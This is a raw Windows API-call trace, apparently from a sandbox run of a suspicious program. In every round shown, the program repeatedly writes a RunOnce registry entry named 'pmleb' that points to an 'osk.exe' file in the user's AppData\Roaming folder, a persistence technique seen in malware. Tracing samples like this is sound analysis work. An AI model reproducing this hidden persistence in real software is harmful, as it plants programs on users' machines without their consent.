WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.037] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.037] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.037] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.037] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.037] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.037] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.038] RegCloseKey (hKey=0x280) returned 0x0 [0080.038] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.038] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.038] SetTimer (hWnd=0x20280, nIDEvent=0x2061, 
uElapse=0xa, lpTimerFunc=0x0) returned 0x2061 [0080.038] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.049] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.049] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.050] KillTimer (hWnd=0x20280, uIDEvent=0x2061) returned 1 [0080.050] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.050] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.050] IUnknown:Release (This=0x787518) returned 0x1 [0080.050] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.050] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.050] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, 
bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.051] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.051] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.051] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.051] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.051] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.051] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.051] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x62 [0080.051] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, 
rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.051] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x63 [0080.051] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.052] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x62 [0080.052] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.052] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.052] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.052] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.052] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.052] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.052] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.052] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, 
cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.052] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.052] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.053] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.053] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.053] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.053] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.053] RegCloseKey (hKey=0x280) returned 0x0 [0080.053] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.053] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.053] SetTimer (hWnd=0x20280, nIDEvent=0x2062, uElapse=0xa, lpTimerFunc=0x0) returned 0x2062 [0080.053] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.065] 
TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.065] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.065] KillTimer (hWnd=0x20280, uIDEvent=0x2062) returned 1 [0080.065] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.065] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.065] IUnknown:Release (This=0x787518) returned 0x1 [0080.065] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.065] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.065] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.066] FileSystemObject:IUnknown:Release 
(This=0x2b53a00) returned 0x1 [0080.066] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.066] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.066] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.066] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.066] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.066] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x63 [0080.066] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.066] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x64 [0080.066] FileSystemObject:IDispatch:Invoke 
(in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.067] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x63 [0080.067] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.067] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.067] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.067] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.067] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.067] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.067] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.067] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) 
returned 61 [0080.067] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.067] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.067] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.067] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.067] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.067] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.068] RegCloseKey (hKey=0x280) returned 0x0 [0080.068] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.068] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.068] SetTimer (hWnd=0x20280, nIDEvent=0x2063, uElapse=0xa, lpTimerFunc=0x0) returned 0x2063 [0080.068] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.080] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.080] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.080] KillTimer (hWnd=0x20280, uIDEvent=0x2063) returned 1 
[0080.080] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.081] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.081] IUnknown:Release (This=0x787518) returned 0x1 [0080.081] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.081] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.081] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.081] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.081] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, 
Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.081] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.081] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.081] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.081] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.081] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x64 [0080.081] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.081] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x65 [0080.082] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, 
[7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.082] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x64 [0080.082] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.082] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.082] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.082] IUnknown:AddRef (This=0x7a9740) returned 0x2 